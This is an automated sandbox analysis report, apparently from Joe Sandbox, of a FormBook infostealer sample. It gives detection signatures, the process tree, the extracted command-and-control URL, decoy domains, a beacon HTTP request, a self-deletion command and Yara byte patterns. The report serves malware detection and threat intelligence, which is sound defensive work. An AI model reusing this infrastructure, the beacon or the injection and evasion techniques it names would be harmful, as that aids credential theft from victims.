Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report EH5ro3Hyug

Overview

General Information

Sample Name:EH5ro3Hyug (renamed file extension from none to exe)
Analysis ID:491359
MD5:dff3bf025dcd487a2f0fb22b4ccf8998
SHA1:1ff59c9410fb281ffc8d2c3c1fc3268eacd5dba1
SHA256:230b56b1d072725eff3a0e100515ba924377c9f0a79308bbfa3123269ee23d56
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • EH5ro3Hyug.exe (PID: 6400 cmdline: 'C:\Users\user\Desktop\EH5ro3Hyug.exe' MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
    • EH5ro3Hyug.exe (PID: 5412 cmdline: C:\Users\user\Desktop\EH5ro3Hyug.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
    • EH5ro3Hyug.exe (PID: 5660 cmdline: C:\Users\user\Desktop\EH5ro3Hyug.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • WWAHost.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4972 cmdline: /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x6fda8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x70012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9d1c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9d432:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7bb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xa8f65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x7b631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xa8a51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x7bc47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xa9067:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x7bdbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa91df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x70a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9de4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x7a8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa7ccc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x71723:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x9eb43:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x81db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xaf1d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x82dba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.EH5ro3Hyug.exe.2c48584.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        6.2.EH5ro3Hyug.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.EH5ro3Hyug.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.EH5ro3Hyug.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18839:$sqlite3step: 68 34 1C 7B E1
          • 0x1894c:$sqlite3step: 68 34 1C 7B E1
          • 0x18868:$sqlite3text: 68 38 2A 90 C5
          • 0x1898d:$sqlite3text: 68 38 2A 90 C5
          • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
          6.2.EH5ro3Hyug.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: EH5ro3Hyug.exeVirustotal: Detection: 31%Perma Link
            Source: EH5ro3Hyug.exeReversingLabs: Detection: 28%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.EH5ro3Hyug.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: EH5ro3Hyug.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: EH5ro3Hyug.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: WWAHost.pdbUGP source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe, 0000000C.00000002.935271786.0000000003C5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 4x nop then jmp 092FAA79h
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 4x nop then jmp 092FAA79h

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
            Source: C:\Windows\explorer.exeDomain query: www.sherwoodmastiff.com
            Source: C:\Windows\explorer.exeDomain query: www.kingtreemusic.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.eastwestasia-thailand.com/hht8/
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: global trafficHTTP traffic detected: GET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1Host: www.sherwoodmastiff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comma
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: EH5ro3Hyug.exeString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: unknownDNS traffic detected: queries for: www.sherwoodmastiff.com
            Source: global trafficHTTP traffic detected: GET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1Host: www.sherwoodmastiff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: EH5ro3Hyug.exe, 00000000.00000002.688667693.0000000001050000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: EH5ro3Hyug.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 0.2.EH5ro3Hyug.exe.810000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 5.0.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 5.2.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 6.0.EH5ro3Hyug.exe.f20000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 6.2.EH5ro3Hyug.exe.f20000.1.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: EH5ro3Hyug.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
